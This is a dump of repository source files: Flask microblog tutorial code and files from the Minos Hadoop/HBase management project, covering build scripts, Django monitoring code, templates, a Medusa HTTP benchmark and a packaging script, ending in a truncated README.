"text": "\"\"\"avatar_hash for User\n\nRevision ID: 0c2176704a5e\nRevises: 68f1fcfa8e56\nCreate Date: 2019-07-25 19:09:49.687092\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '0c2176704a5e'\ndown_revision = '68f1fcfa8e56'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('user', sa.Column('avatar_hash', sa.String(length=32), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('user', 'avatar_hash')\n # ### end Alembic commands ###\n"
},
{
"alpha_fraction": 0.7012711763381958,
"alphanum_fraction": 0.7097457647323608,
"avg_line_length": 22.600000381469727,
"blob_id": "0ab6286180bc2a9d4f61affb3078dc1b5080c1d2",
"content_id": "45613d59c3322c9f679f037e21f7736f20ae7a79",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 944,
"license_type": "permissive",
"max_line_length": 63,
"num_lines": 40,
"path": "/app/api/auth.py",
"repo_name": "laggardkernel/tutorial-py-microblog",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom flask import g\nfrom flask_httpauth import HTTPBasicAuth, HTTPTokenAuth\nfrom app.models import User\nfrom .errors import error_response\n\nbasic_auth = HTTPBasicAuth()\ntoken_auth = HTTPTokenAuth() # default scheme \"Bearer\"\n\n\n@basic_auth.verify_password\ndef verify_password(username, password):\n user = User.query.filter_by(username=username).first()\n if user is None:\n return False\n g.current_user = user\n return user.check_password(password)\n\n\n@basic_auth.error_handler\ndef basic_auth_error():\n # forbidden\n return error_response(401)\n\n\n@token_auth.verify_token\ndef verify_token(token):\n \"\"\"\n Auth with \"Authorization:Bearer token\"\n :param token:\n :return: boolean\n \"\"\"\n g.current_user = User.check_token(token) if token else None\n return g.current_user is not None\n\n\n@token_auth.error_handler\ndef token_auth_error():\n return error_response(401)\n"
},
{
"alpha_fraction": 0.5280612111091614,
"alphanum_fraction": 0.704081654548645,
"avg_line_length": 17.66666603088379,
"blob_id": "95c095348de9447fe1ea9fa23b6499df6207fe85",
"content_id": "b02e94664c92c99a499ec008a1e300dd9af31651",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 392,
"license_type": "permissive",
"max_line_length": 28,
"num_lines": 21,
"path": "/requirements.txt",
"repo_name": "laggardkernel/tutorial-py-microblog",
"src_encoding": "UTF-8",
"text": "elasticsearch==6.3.1\nFlask-Babel==0.12.2\nFlask-Bootstrap==3.3.7.1\nFlask-HTTPAuth==3.2.4\nFlask-Login==0.4.1\nFlask-Mail==0.9.1\nFlask-Migrate==2.3.1\nFlask-Moment==0.6.0\nFlask-WTF==0.14.2\nguess-language-spirit==0.5.3\npipdeptree==0.13.2\nPyJWT==1.7.1\npython-dotenv==0.10.1\nrequests==2.21.0\nrq==0.13.0\nsetuptools==41.0.1\nwheel==0.33.4\n\n# requirements for Heroku\n#psycopg2==2.7.3.1\n#gunicorn==19.7.1\n"
},
{
"alpha_fraction": 0.7369668483734131,
"alphanum_fraction": 0.7606635093688965,
"avg_line_length": 20.100000381469727,
"blob_id": "5123378170a9d6318b5ac0071db214061c905e6d",
"content_id": "d0b64fe7761c3737c5c7a3858b781337679e6717",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 422,
"license_type": "permissive",
"max_line_length": 102,
"num_lines": 20,
"path": "/README.md",
"repo_name": "laggardkernel/tutorial-py-microblog",
"src_encoding": "UTF-8",
"text": "# Practice of Flask Mega Tutorial\n\n[Flask Mega-Tutorial](https://blog.miguelgrinberg.com/post/the-flask-mega-tutorial-part-i-hello-world)\n\n## Additional Settings Needed\n```\n# .env file\nSECRET_KEY=you-may-guess-this\n# export FLASK_DEBUG=1\n\nMAIL_SERVER=localhost\nMAIL_PORT=8025\nMAIL_USE_TLS=1\nMAIL_USERNAME=\nMAIL_PASSWORD=\[email protected]\n\nMS_TRANSLATOR_KEY=<paste-your-key-here>\nELASTICSEARCH_URL='http://localhost:9200'\n```\n"
}
] | 8 |
jkingben/minos | https://github.com/jkingben/minos | e8804dc03503497fc55c9570e8495c563587ab69 | 23d26fda71fcd1068e65958b3aef03d9cafd5453 | c0d63b25f5ae6c0dc18d80a2fa8b14d7681e027d | refs/heads/master | 2020-05-07T13:33:44.962162 | 2019-04-10T10:47:27 | 2019-04-10T10:47:27 | 180,554,473 | 0 | 0 | Apache-2.0 | 2019-04-10T10:03:24 | 2019-04-08T06:34:02 | 2015-05-28T09:15:32 | null | [
{
"alpha_fraction": 0.4375617802143097,
"alphanum_fraction": 0.4471169710159302,
"avg_line_length": 42.98550796508789,
"blob_id": "cc1d62739595cd9f2f94ee6598a4d6634a979d90",
"content_id": "f1b39e8a9f6fbab4858b4d6e5d1f6bb0b9eb853c",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 3035,
"license_type": "permissive",
"max_line_length": 344,
"num_lines": 69,
"path": "/owl/static/highcharts/modules/data.js",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "/*\n Data plugin for Highcharts v0.1\n\n (c) 2012 Torstein Hønsi\n\n License: www.highcharts.com/license\n */\n(function (m) {\n var l = m.each, n = function (a) {\n this.init(a)\n };\n m.extend(n.prototype, {init:function (a) {\n this.options = a;\n this.columns = [];\n this.parseCSV();\n this.parseTable();\n this.parseTypes();\n this.findHeaderRow();\n this.parsed();\n this.complete()\n }, parseCSV:function () {\n var a = this.options, b = a.csv, d = this.columns, c = a.startRow || 0, f = a.endRow || Number.MAX_VALUE, e = a.startColumn || 0, j = a.endColumn || Number.MAX_VALUE;\n b && (b = b.split(a.lineDelimiter || \"\\n\"), l(b, function (b, k) {\n if (k >= c && k <= f) {\n var h = b.split(a.itemDelimiter || \",\");\n l(h, function (a, b) {\n b >= e && b <= j && (d[b - e] || (d[b - e] = []), d[b - e][k - c] = a)\n })\n }\n }))\n }, parseTable:function () {\n var a = this.options, b = a.table, d = this.columns, c = a.startRow || 0, f = a.endRow || Number.MAX_VALUE, e = a.startColumn || 0, j = a.endColumn || Number.MAX_VALUE, g;\n b && (typeof b === \"string\" && (b = document.getElementById(b)), l(b.getElementsByTagName(\"tr\"), function (a, b) {\n g = 0;\n b >= c && b <= f && l(a.childNodes, function (a) {\n if ((a.tagName === \"TD\" || a.tagName === \"TH\") && g >= e && g <= j)d[g] || (d[g] = []), d[g][b - c] = a.innerHTML, g += 1\n })\n }))\n }, findHeaderRow:function () {\n l(this.columns,\n function () {\n });\n this.headerRow = 0\n }, trim:function (a) {\n return a.replace(/^\\s+|\\s+$/g, \"\")\n }, parseTypes:function () {\n for (var a = this.columns, b = a.length, d, c, f, e; b--;)for (d = a[b].length; d--;)c = a[b][d], f = parseFloat(c), e = this.trim(c), e == f ? (a[b][d] = f, f > 31536E6 ? a[b].isDatetime = !0 : a[b].isNumeric = !0) : (c = Date.parse(c), b === 0 && typeof c === \"number\" && !isNaN(c) ? (a[b][d] = c, a[b].isDatetime = !0) : a[b][d] = e)\n }, parsed:function () {\n this.options.parsed && this.options.parsed.call(this, this.columns)\n }, complete:function () {\n var a = this.columns,\n b, d, c, f, e = this.options, j, g, k, h, i;\n if (e.complete) {\n a.length > 1 && (c = a.shift(), this.headerRow === 0 && c.shift(), (b = c.isNumeric || c.isDatetime) || (d = c), c.isDatetime && (f = \"datetime\"));\n j = [];\n for (h = 0; h < a.length; h++) {\n this.headerRow === 0 && (k = a[h].shift());\n g = [];\n for (i = 0; i < a[h].length; i++)g[i] = a[h][i] !== void 0 ? b ? [c[i], a[h][i]] : a[h][i] : null;\n j[h] = {name:k, data:g}\n }\n e.complete({xAxis:{categories:d, type:f}, series:j})\n }\n }});\n m.Data = n;\n m.data = function (a) {\n return new n(a)\n }\n})(Highcharts);\n"
},
{
"alpha_fraction": 0.4486652910709381,
"alphanum_fraction": 0.47227925062179565,
"avg_line_length": 47.70000076293945,
"blob_id": "c259a19b1b745e172c7b4e6abd27faf4dd7ed609",
"content_id": "6dd50d078358fc006685fe20dd3596af7b358b2a",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 1948,
"license_type": "permissive",
"max_line_length": 192,
"num_lines": 40,
"path": "/owl/templates/monitor/hbase_regionserver_operation.html",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "{% extends \"monitor/hbase_base.html\" %}\n{% load extended_filter %}\n\n{% block hbase_content %}\n <div class=\"row\">\n <div id=\"sidebar\" class=\"span1\">\n <ul class=\"nav nav-list affix\">\n <li><a href=\"/monitor/regionserver/{{regionserver.id}}\">SummaryMetrics</a></li>\n <li><strong>---------------</strong></li>\n {% for metric in tsdb_metrics%}\n <li><a href=\"#{{metric.0}}\">{{metric.0}}</a></li>\n {% endfor %}\n </ul>\n </div>\n <div class=\"span11\">\n {% for metric in tsdb_metrics %}\n <section id=\"{{metric.0}}\">\n <div class=\"row\">\n <div class=\"span11\">\n <!-- show NumOps -->\n <div class=\"span5\">\n <center>{{metric.1.title}}</center>\n <a href=\"{{tsdb_url_prefix}}/#start={{start_date}}{{ metric.1.query|join:\"\"}}&yrange=[0:]&key=out%20center%20top&wxh={{12|pic_width}}x{{metric.1.query|pic_heigth}}\" >\n <img src=\"{{tsdb_url_prefix}}/q?start={{start_date}}{{ metric.1.query|join:\"\"}}&yrange=[0:]&key=out%20center%20top&wxh={{6|pic_width}}x{{metric.1.query|pic_heigth}}&png\" />\n </a>\n </div>\n\n <!-- show percentile graph if necessary -->\n <div class=\"span5\">\n <center>{{metric.2.title}}</center>\n <a href=\"{{tsdb_url_prefix}}/#start={{start_date}}{{metric.2.query|join:\"\"}}&yrange=[0:]&key=out%20center%20top&wxh={{12|pic_width}}x{{metric.2.query|pic_heigth}}\" >\n <img src=\"{{tsdb_url_prefix}}/q?start={{start_date}}{{metric.2.query|join:\"\"}}&yrange=[0:]&key=out%20center%20top&wxh={{6|pic_width}}x{{metric.2.query|pic_heigth}}&png\" />\n </a>\n </div>\n </div>\n </section>\n {% endfor %}\n </div>\n </div>\n{% endblock %}\n"
},
{
"alpha_fraction": 0.5403422713279724,
"alphanum_fraction": 0.5623471736907959,
"avg_line_length": 14.730769157409668,
"blob_id": "9074b69e257bf5408db3871554e26e46873d6d89",
"content_id": "bd6819ef020008909a034e1fd50015f29a8415f4",
"detected_licenses": [
"HPND",
"Apache-2.0",
"BSD-3-Clause-Modification",
"ZPL-2.1",
"LicenseRef-scancode-supervisor"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 409,
"license_type": "permissive",
"max_line_length": 59,
"num_lines": 26,
"path": "/supervisor/supervisor/medusa/debian/prerm",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "#! /bin/sh \n# prerm script for medusa\n\nset -e\n\nPACKAGE=python2.3-medusa\nVERSION=2.3\nLIB=\"/usr/lib/python$VERSION\"\nDIRLIST=\"$LIB/site-packages/medusa\"\n\ncase \"$1\" in\n remove|upgrade|failed-upgrade)\n for i in $DIRLIST ; do\n find $i -name '*.py[co]' -exec rm \\{\\} \\;\n done\n ;;\n\n *)\n echo \"prerm called with unknown argument \\`$1'\" >&2\n exit 1\n ;;\nesac\n\n\n\nexit 0\n"
},
{
"alpha_fraction": 0.715593695640564,
"alphanum_fraction": 0.7175965905189514,
"avg_line_length": 33.939998626708984,
"blob_id": "82144b049df55889640935480c34f714d8af9f38",
"content_id": "0cbceb85375eef101e3edc25c24b9d817ed2d890",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3495,
"license_type": "permissive",
"max_line_length": 83,
"num_lines": 100,
"path": "/build/build.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "import argparse\n\nimport build_owl\nimport build_supervisor\nimport build_tank\nimport build_utils\n\nfrom minos_config import Log\nfrom minos_config import TANK_DEFAULT_IP\nfrom minos_config import TANK_DEFAULT_PORT\n\nCOMPONENT_BUILD_TOOL_MAP = {\n \"tank\": build_tank,\n \"supervisor\": build_supervisor,\n \"owl\": build_owl,\n}\n\ndef add_component_arguments(parser):\n parser.add_argument(\"component\",\n choices=COMPONENT_BUILD_TOOL_MAP.keys(),\n help=\"The component to built.\")\n parser.add_argument(\"--tank_ip\", type=str, nargs=\"?\",\n default=TANK_DEFAULT_IP,\n help=\"The ip of localhost to use for tank server.\")\n parser.add_argument(\"--tank_port\", type=int, nargs=\"?\",\n default=TANK_DEFAULT_PORT,\n help=\"The port to use for tank server.\")\n parser.add_argument(\"--owl_ip\", type=str, nargs=\"?\",\n default='127.0.0.1',\n help=\"The localhost ip for owl configuration.\")\n parser.add_argument(\"--owl_port\", type=int, nargs=\"?\",\n default=0,\n help=\"The port to use for owl monitor.\")\n\ndef parse_command_line():\n parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n description=\"Manage the Minos components.\")\n\n subparsers = parser.add_subparsers(\n title=\"commands\",\n help=\"Type '%(prog)s command -h' to get more help for individual command.\")\n\n sub_parser = subparsers.add_parser(\n \"start\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n help=\"Start the specified Minos component.\")\n sub_parser.add_argument(\"--skip_setup_hbase\", action=\"store_true\", default=False,\n help=\"Whether skip setting up the default stand-alone hbase or not.\")\n sub_parser.add_argument(\"--quota_updater\", action=\"store_true\", default=False,\n help=\"Whether starting quota updater or not.\")\n add_component_arguments(sub_parser)\n sub_parser.set_defaults(handler=process_command_start)\n\n sub_parser = subparsers.add_parser(\n \"stop\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n help=\"Stop the specified Minos component.\")\n add_component_arguments(sub_parser)\n sub_parser.set_defaults(handler=process_command_stop)\n\n sub_parser = subparsers.add_parser(\n \"build\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n help=\"Build Minos client, Tank, Supervisor offline.\")\n sub_parser.add_argument(\"--offline\", action=\"store_true\", default=False,\n help=\"Whether build offline or not for Client, Tank, Supervisor.\")\n sub_parser.add_argument(\"--package_dir\", type=str, nargs=\"?\",\n default=None, help=\"The offline packages directory.\")\n sub_parser.set_defaults(handler=process_command_build)\n\n args = parser.parse_args()\n return args\n\ndef process_command_start(args):\n build_tool = COMPONENT_BUILD_TOOL_MAP.get(args.component)\n if build_tool:\n return build_tool.start(args)\n Log.print_critical(\"Unknown component name: %s.\", args.component)\n\ndef process_command_stop(args):\n build_tool = COMPONENT_BUILD_TOOL_MAP.get(args.component)\n if build_tool:\n return build_tool.stop(args)\n Log.print_critical(\"Unknown component name: %s.\", args.component)\n\ndef process_command_build(args):\n if not args.offline or not args.package_dir:\n Log.print_critical(\"ERROR: Building Minos offline needs to specify \" \\\n \"the arguments '--offline' and the offline packages directory \" \\\n \"'--package_dir' explicitly\")\n\n build_utils.pip_install_offline(args.package_dir)\n\ndef main():\n args = parse_command_line()\n return args.handler(args)\n\nif __name__ == '__main__':\n main()\n\n"
},
{
"alpha_fraction": 0.4996126890182495,
"alphanum_fraction": 0.5216886401176453,
"avg_line_length": 25.61855697631836,
"blob_id": "b2beaf8a436e551ab12cc856e45f437b2cf51fbd",
"content_id": "c2239daf8a7cae989ecfa12362f74db51c123627",
"detected_licenses": [
"HPND",
"Apache-2.0",
"BSD-3-Clause-Modification",
"ZPL-2.1",
"LicenseRef-scancode-supervisor"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2582,
"license_type": "permissive",
"max_line_length": 83,
"num_lines": 97,
"path": "/supervisor/supervisor/medusa/test/asyn_http_bench.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "# -*- Mode: Python -*-\n\nimport asyncore\nimport socket\nimport string\nimport sys\n\ndef blurt (thing):\n sys.stdout.write (thing)\n sys.stdout.flush ()\n\ntotal_sessions = 0\n\nclass http_client (asyncore.dispatcher_with_send):\n def __init__ (self, host='127.0.0.1', port=80, uri='/', num=10):\n asyncore.dispatcher_with_send.__init__ (self)\n self.create_socket (socket.AF_INET, socket.SOCK_STREAM)\n self.host = host\n self.port = port\n self.uri = uri\n self.num = num\n self.bytes = 0\n self.connect ((host, port))\n\n def log (self, *info):\n pass\n\n def handle_connect (self):\n self.connected = 1\n# blurt ('o')\n self.send ('GET %s HTTP/1.0\\r\\n\\r\\n' % self.uri)\n\n def handle_read (self):\n# blurt ('.')\n d = self.recv (8192)\n self.bytes = self.bytes + len(d)\n\n def handle_close (self):\n global total_sessions\n# blurt ('(%d)' % (self.bytes))\n self.close()\n total_sessions = total_sessions + 1\n if self.num:\n http_client (self.host, self.port, self.uri, self.num-1)\n\nimport time\nclass timer:\n def __init__ (self):\n self.start = time.time()\n def end (self):\n return time.time() - self.start\n\nfrom asyncore import socket_map, poll\n\nMAX = 0\n\ndef loop (timeout=30.0):\n global MAX\n while socket_map:\n if len(socket_map) > MAX:\n MAX = len(socket_map)\n poll (timeout)\n\nif __name__ == '__main__':\n if len(sys.argv) < 6:\n print 'usage: %s <host> <port> <uri> <hits> <num_clients>' % sys.argv[0]\n else:\n [host, port, uri, hits, num] = sys.argv[1:]\n hits = string.atoi (hits)\n num = string.atoi (num)\n port = string.atoi (port)\n t = timer()\n clients = map (lambda x: http_client (host, port, uri, hits-1), range(num))\n #import profile\n #profile.run ('loop')\n loop()\n total_time = t.end()\n print (\n '\\n%d clients\\n%d hits/client\\n'\n 'total_hits:%d\\n%.3f seconds\\ntotal hits/sec:%.3f' % (\n num,\n hits,\n total_sessions,\n total_time,\n total_sessions / total_time\n )\n )\n print 'Max. number of concurrent sessions: %d' % (MAX)\n\n\n# linux 2.x, talking to medusa\n# 50 clients\n# 1000 hits/client\n# total_hits:50000\n# 2255.858 seconds\n# total hits/sec:22.165\n# Max. number of concurrent sessions: 50\n"
},
{
"alpha_fraction": 0.6743119359016418,
"alphanum_fraction": 0.6743119359016418,
"avg_line_length": 25.75,
"blob_id": "92593a294ce5290541ab91c5d4dcac88f9c06190",
"content_id": "6ae5c43f12289a337d6268d43e384eadb4c0ebb0",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 218,
"license_type": "permissive",
"max_line_length": 43,
"num_lines": 8,
"path": "/owl/collector/management/commands/collect_utils.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "\nMETRIC_TASK_TYPE = \"Metric\"\nSTATUS_TASK_TYPE = \"Status\"\nAGGREGATE_TASK_TYPE = \"Aggregate\"\n\nclass QueueTask:\n def __init__(self, task_type, task_data):\n self.task_type = task_type\n self.task_data = task_data\n\n\n\n"
},
{
"alpha_fraction": 0.6015625,
"alphanum_fraction": 0.62890625,
"avg_line_length": 20.25,
"blob_id": "b579b0f87c89ebc6e49e6408adba1ad0bb757a79",
"content_id": "a267096e6145db65a05b9ef65ed7f9eb0c09ff8c",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 256,
"license_type": "permissive",
"max_line_length": 105,
"num_lines": 12,
"path": "/build/bin/start_opentsdb.sh",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nif [ $# -lt 1 ]; then\n echo \"usage: $0 port\"\n exit 1\nfi\n\ntsdtmp=${TMPDIR-'/tmp'}/tsd\nmkdir -p \"$tsdtmp\"\nnohup ./build/tsdb tsd --port=$1 --staticroot=build/staticroot --cachedir=\"$tsdtmp\" 1>opentsdb.out 2>&1 &\n\necho $! > $OPENTSDB_PID_FILE\n\n"
},
{
"alpha_fraction": 0.7483627200126648,
"alphanum_fraction": 0.7511335015296936,
"avg_line_length": 43.088890075683594,
"blob_id": "16f7a439d93e89dc1a77f41548d197b2307144ee",
"content_id": "cfaa6e985bc3bf4ba7f07fdb8353004b540789f2",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3970,
"license_type": "permissive",
"max_line_length": 92,
"num_lines": 90,
"path": "/owl/collector/management/commands/metrics_aggregator.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "import json\nimport logging\nimport sys\n\nfrom monitor import dbutil\nfrom monitor.models import Table, HBaseCluster\n\n# TODO: move these suffix definition to monitor/metric_help.py\nOPERATION_NUM_OPS = 'NumOps'\nOPERATION_AVG_TIME = 'AvgTime'\nOPERATION_MIN_TIME = 'MinTime'\nOPERATION_MAX_TIME = 'MaxTime'\nOPERATION_TOTAL_TIME = 'TotalTime'\n\nlogger = logging.getLogger(__name__)\n\ndef make_empty_operation_metric():\n operationMetric = {}\n operationMetric[OPERATION_NUM_OPS] = 0\n operationMetric[OPERATION_TOTAL_TIME] = 0\n operationMetric[OPERATION_MAX_TIME] = 0\n operationMetric[OPERATION_MIN_TIME] = sys.maxint\n return operationMetric\n\ndef aggregate_one_region_operation_metric(aggregateMetric, deltaMetric):\n if OPERATION_NUM_OPS in deltaMetric:\n aggregateMetric[OPERATION_NUM_OPS] += deltaMetric[OPERATION_NUM_OPS]\n aggregateMetric[OPERATION_TOTAL_TIME] += (deltaMetric[OPERATION_AVG_TIME]\n * deltaMetric[OPERATION_NUM_OPS])\n if aggregateMetric[OPERATION_MAX_TIME] < deltaMetric[OPERATION_MAX_TIME]:\n aggregateMetric[OPERATION_MAX_TIME] = deltaMetric[OPERATION_MAX_TIME]\n if aggregateMetric[OPERATION_MIN_TIME] > deltaMetric[OPERATION_MIN_TIME]:\n aggregateMetric[OPERATION_MIN_TIME] = deltaMetric[OPERATION_MIN_TIME]\n\ndef compute_avg_time_and_num_ops_after_aggregation(operationMetrics):\n for operationName in operationMetrics.keys():\n if operationMetrics[operationName][OPERATION_NUM_OPS] > 0:\n # now, region operation metric will be collect every 10 seconds,\n # the orignal ops is the sum of ops during 10 seconds\n operationMetrics[operationName][OPERATION_AVG_TIME] = \\\n (operationMetrics[operationName][OPERATION_TOTAL_TIME]\n / operationMetrics[operationName][OPERATION_NUM_OPS])\n operationMetrics[operationName][OPERATION_NUM_OPS] = \\\n operationMetrics[operationName][OPERATION_NUM_OPS] / 10\n else:\n operationMetrics[operationName][OPERATION_AVG_TIME] = 0\n\ndef aggregate_region_operation_metric_in_process(output_queue, task_data):\n allClusterOperationMetric = {}\n # because the number of regions could be huge. We read out region operation metrics\n # by table, then table operation metrics and cluster operation metrics could be aggregated\n tables = Table.objects.all()\n for table in tables:\n clusterName = table.cluster.name\n clusterOperationMetric = allClusterOperationMetric.setdefault(clusterName, {})\n tableOperationMetric = {}\n regions = dbutil.get_region_by_table(table)\n logger.info(\n \"TableOperationMetricAggregation aggregate %d \" \\\n \"regions metric for table %s, cluster %s\", len(regions),\n table.name, clusterName)\n\n for region in regions:\n if region.operationMetrics is None or region.operationMetrics == '':\n continue;\n regionOperationMetrics = json.loads(region.operationMetrics)\n for regionOperationName in regionOperationMetrics.keys():\n regionOperation = regionOperationMetrics[regionOperationName]\n aggregate_one_region_operation_metric(\n tableOperationMetric.setdefault(regionOperationName,\n make_empty_operation_metric()), regionOperation)\n aggregate_one_region_operation_metric(\n clusterOperationMetric.setdefault(regionOperationName,\n make_empty_operation_metric()), regionOperation)\n\n # compute avgTime for table operation metrics\n compute_avg_time_and_num_ops_after_aggregation(tableOperationMetric)\n table.operationMetrics = json.dumps(tableOperationMetric)\n table.save()\n\n # compute avgTime for clusetr operation metrics\n clusters = HBaseCluster.objects.all()\n for cluster in clusters:\n clusterName = cluster.cluster.name\n if clusterName in allClusterOperationMetric:\n clusterOperationMetric = allClusterOperationMetric[clusterName]\n compute_avg_time_and_num_ops_after_aggregation(clusterOperationMetric)\n cluster.operationMetrics = json.dumps(clusterOperationMetric)\n cluster.save()\n return\n\n\n"
},
{
"alpha_fraction": 0.692307710647583,
"alphanum_fraction": 0.692307710647583,
"avg_line_length": 17.428571701049805,
"blob_id": "4e57d9e79faf2f8643ec4fac4f393d4e65733abb",
"content_id": "1d41697f888cb9497f4d76aa3529890ace81b598",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 130,
"license_type": "permissive",
"max_line_length": 41,
"num_lines": 7,
"path": "/owl/start_owl_collector.sh",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nsource $SCRIPT_UTILS\nnohup ./collector.sh &\n\nchild_pid=`get_child_pid $!`\necho $child_pid > $OWL_COLLECTOR_PID_FILE\n\n"
},
{
"alpha_fraction": 0.6282051205635071,
"alphanum_fraction": 0.6794871687889099,
"avg_line_length": 30.200000762939453,
"blob_id": "613d04f06df9eabbf1aa21f76d45dcb5ac566c10",
"content_id": "d7fc49672accb2f6f3ee65380096a5dade2183b1",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 156,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 5,
"path": "/owl/quota_updater.sh",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\nsource \"$(dirname $0)\"/../build/minos_env.sh || exit 1\ncd $OWL_ROOT\n\n$ENV_PYTHON manage.py quota_updater --period=3600 > quota_updater.log 2>&1\n"
},
{
"alpha_fraction": 0.7237604856491089,
"alphanum_fraction": 0.7276239395141602,
"avg_line_length": 29.45098114013672,
"blob_id": "875e390d8801c51bab541e13b0a45f3938741953",
"content_id": "daf694cc866d384e46dcc197c03ae378c176c4bd",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1553,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 51,
"path": "/owl/machine/models.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "from django.contrib.auth import models as auth_models\nfrom django.db import models\nfrom django.db.models.signals import pre_save, post_save\nfrom django.dispatch import receiver\n\n\nclass LowerCaseCharField(models.CharField):\n \"\"\"\n Defines a charfield which automatically converts all inputs to\n lowercase and saves.\n \"\"\"\n\n def pre_save(self, model_instance, add):\n \"\"\"\n Converts the string to lowercase before saving.\n \"\"\"\n current_value = getattr(model_instance, self.attname)\n setattr(model_instance, self.attname, current_value.lower())\n return getattr(model_instance, self.attname)\n\n\nclass Machine(models.Model):\n # Identifier\n hostname = LowerCaseCharField(max_length=64, unique=True)\n ip = models.IPAddressField(unique=True)\n\n # Location\n idc = LowerCaseCharField(max_length=8)\n rack = LowerCaseCharField(max_length=8)\n\n # Capacity\n cores = models.IntegerField()\n ram = models.IntegerField(\n help_text='RAM in G bytes')\n disks = models.IntegerField(\n help_text='Number of disks')\n disk_capacity = models.IntegerField(\n help_text='Capaciy of each disk in G bytes')\n ssds = models.IntegerField(default=0,\n help_text='Number of SSDs')\n ssd_capacity = models.IntegerField(default=0,\n help_text='Capaciy of each SSD in G bytes')\n\n # Trace record change\n create_time = models.DateTimeField(auto_now_add=True)\n update_time = models.DateTimeField(auto_now=True)\n\n\n@receiver(pre_save, sender=auth_models.User)\ndef auth_user_pre_save(sender, instance=None, **kwargs):\n instance.is_staff = True\n"
},
{
"alpha_fraction": 0.7572755217552185,
"alphanum_fraction": 0.7632198333740234,
"avg_line_length": 38.19902801513672,
"blob_id": "f7762d2cbc9141f7b66eaa9244c4475c59643521",
"content_id": "e3d082ccafa55620d467047d3f8c154f87827227",
"detected_licenses": [
"BSD-3-Clause-Modification",
"ZPL-2.1",
"LicenseRef-scancode-supervisor",
"HPND",
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 8075,
"license_type": "permissive",
"max_line_length": 123,
"num_lines": 206,
"path": "/supervisor/supervisor/medusa/docs/README.html",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "<html>\n<body>\n\n<h1> What is Medusa? </h1>\n<hr>\n\n<p>\nMedusa is an architecture for very-high-performance TCP/IP servers\n(like HTTP, FTP, and NNTP). Medusa is different from most other\nservers because it runs as a single process, multiplexing I/O with its\nvarious client and server connections within a single process/thread.\n\n<p>\nIt is capable of smoother and higher performance than most other\nservers, while placing a dramatically reduced load on the server\nmachine. The single-process, single-thread model simplifies design\nand enables some new persistence capabilities that are otherwise\ndifficult or impossible to implement.\n\n<p>\nMedusa is supported on any platform that can run Python and includes a\nfunctional implementation of the <socket> and <select>\nmodules. This includes the majority of Unix implementations.\n\n<p>\nDuring development, it is constantly tested on Linux and Win32\n[Win95/WinNT], but the core asynchronous capability has been shown to\nwork on several other platforms, including the Macintosh. It might\neven work on VMS.\n\n\n<h2>The Power of Python</h2>\n\n<p>\nA distinguishing feature of Medusa is that it is written entirely in\nPython. Python (<a href=\"http://www.python.org/\">http://www.python.org/</a>) is a\n'very-high-level' object-oriented language developed by Guido van\nRossum (currently at CNRI). It is easy to learn, and includes many\nmodern programming features such as storage management, dynamic\ntyping, and an extremely flexible object system. It also provides\nconvenient interfaces to C and C++.\n\n<p>\nThe rapid prototyping and delivery capabilities are hard to exaggerate;\nfor example\n<ul>\n\n <li>It took me longer to read the documentation for persistent HTTP\n connections (the 'Keep-Alive' connection token) than to add the\n feature to Medusa.\n\n <li>A simple IRC-like chat server system was written in about 90 minutes.\n\n</ul>\n\n<p> I've heard similar stories from alpha test sites, and other users of\nthe core async library.\n\n<h2>Server Notes</h2>\n\n<p>Both the FTP and HTTP servers use an abstracted 